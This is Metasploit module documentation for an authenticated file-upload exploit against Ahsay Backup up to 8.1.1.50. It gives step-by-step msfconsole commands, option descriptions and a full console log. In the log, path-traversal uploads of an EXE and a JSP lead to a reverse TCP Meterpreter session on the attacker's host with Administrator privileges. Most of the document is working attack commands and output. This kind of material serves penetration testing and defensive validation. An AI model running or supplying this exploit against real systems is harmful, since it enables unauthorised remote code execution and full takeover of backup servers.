## Vulnerable Application

  Ahsay Backup v7.x - v8.1.1.50
  Download the vulnerable version: `http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe`
  Start the application ( I start it manually from `C:\Program Files\AhsayCBS\bin\startup.bat`)

## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/windows/misc/ahsay_fileupload`
  3. enable create trial account `set CREATEACCOUNT true`
  4. set RHOST `set RHOST 172.16.238.175`
  5. set LHOST `set LHOST 172.16.238.235`
  6. run exploit `run`
  7. We should receive a meterpreter shell.

## Options

   CREATEACCOUNT  - Create a Trial account, use this when trial accounts is enabled and you do not have a valid credentials.
   PASSWORD       - Password to Ahsay useraccount, if CREATEACCOUNT is set this password will be used.
   RHOST          - Target address.
   RPORT          - The target port (TCP).
   TARGETURI      - Path to Ahsay installation
   UPLOADPATH     - Path to where the file should be uploaded
   USERNAME       - Username to Ahsay account, if CREATEACCOUNT is set this username will be used.

## Scenarios

### Ahsay 8.1.1.50 on Windows 2003 SP2

  ```
msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
CREATEACCOUNT => true
msf exploit(windows/misc/ahsay_fileupload) > set RHOST 172.16.238.175
RHOST => 172.16.238.175
msf exploit(windows/misc/ahsay_fileupload) > set LHOST 172.16.238.235
LHOST => 172.16.238.235
msf exploit(windows/misc/ahsay_fileupload) > run

[*] Started reverse TCP handler on 172.16.238.235:4444 
[+] Username and password are valid!
[+] No need to create account, already exists!
[*] Uploading payload
[+] Successfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe
[*] Uploading payload
[+] Successfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp
[*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp
[+] Exploit executed!
[*] Sending stage (179779 bytes) to 172.16.238.175
[*] Meterpreter session 1 opened (172.16.238.235:4444 -> 172.16.238.175:1114) at 2019-07-16 14:59:45 +0200
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/lcofxnrzON.exe' on the target
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/myjnJMFlNi.jsp' on the target

meterpreter > getuid
Server username: AHSAY-123\Administrator
  ```